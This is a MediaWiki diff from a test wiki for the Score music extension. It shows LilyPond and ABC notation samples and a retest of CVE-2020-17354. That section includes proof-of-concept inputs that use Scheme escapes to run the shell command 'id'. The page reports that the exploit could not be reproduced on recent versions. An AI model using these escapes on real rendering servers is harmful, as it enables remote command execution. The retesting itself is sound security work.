ZMOG test wiki (master branch)
Tim paste: Difference between revisions

Tim paste: Difference between revisions

From ZMOG test wiki (master branch)
Line 57: Line 57:
== CVE-2020-17354 ==
== CVE-2020-17354 ==


See [https://phabricator.wikimedia.org/T259210 T259210]
See [https://phabricator.wikimedia.org/T259210 T259210]; unable to reproduce with LilyPond 2.23.82, MediaWiki REL1_39, Score on master.


1. PoC from task:<score>
1. PoC from task:<score>

Revision as of 01:34, 20 January 2023

Normal

% 22 \relative c' { c d e f }

Multipage

Page 1Page 2

Raw

% 6 \score { \relative c' { c d e } } \header { tagline = ##f } \paper { #(set-paper-size "a5") }

Starling

% 8 \relative a' { \set Staff.midiInstrument = #"recorder" \set Score.tempoHideNote = ##t \tempo 4 = 145 \key g \major \time 2/2 \partial 4 b8 c d4 d d g fis fis g g a a a8 b c a b2 }

Rest

{ r2 }

ABC

X:1 M:C L:1/4 K:C C, D, E, F,|G, A, B, C|D E F G|A B c d| e f g a|b c' d' e'|f' g' a' b'|]

CVE-2020-17354

See T259210; unable to reproduce with LilyPond 2.23.82, MediaWiki REL1_39, Score on master.

1. PoC from task:

Unable to compile LilyPond input file: 

line 6 - column 1:
Spurious expression in \score

2. Again, using raw=1:

\header { tagline = ##f } { \relative { c' } } #(begin (define location 1) (display "With output-def-scope\n") (eval '(system "id") (ly:output-def-scope #{ \midi {} #})) (display "With output-def-lookup\n") ((ly:output-def-lookup #{ \midi {} #} 'system) "id") )

3. Notehead stencil hack PoC, contributed in comment from LilyPond developer Han-wen Nienhuys:

{ \override NoteHead.text = \system \override NoteHead.stencil = #(lambda (grob) ((cdr (assoc 'text (cadr (ly:grob-alist-chain grob '())))) "id") #f) c4 }
Retrieved from "http://mw-master.test.jon.geek.nz/w/index.php?title=Tim_paste&oldid=35"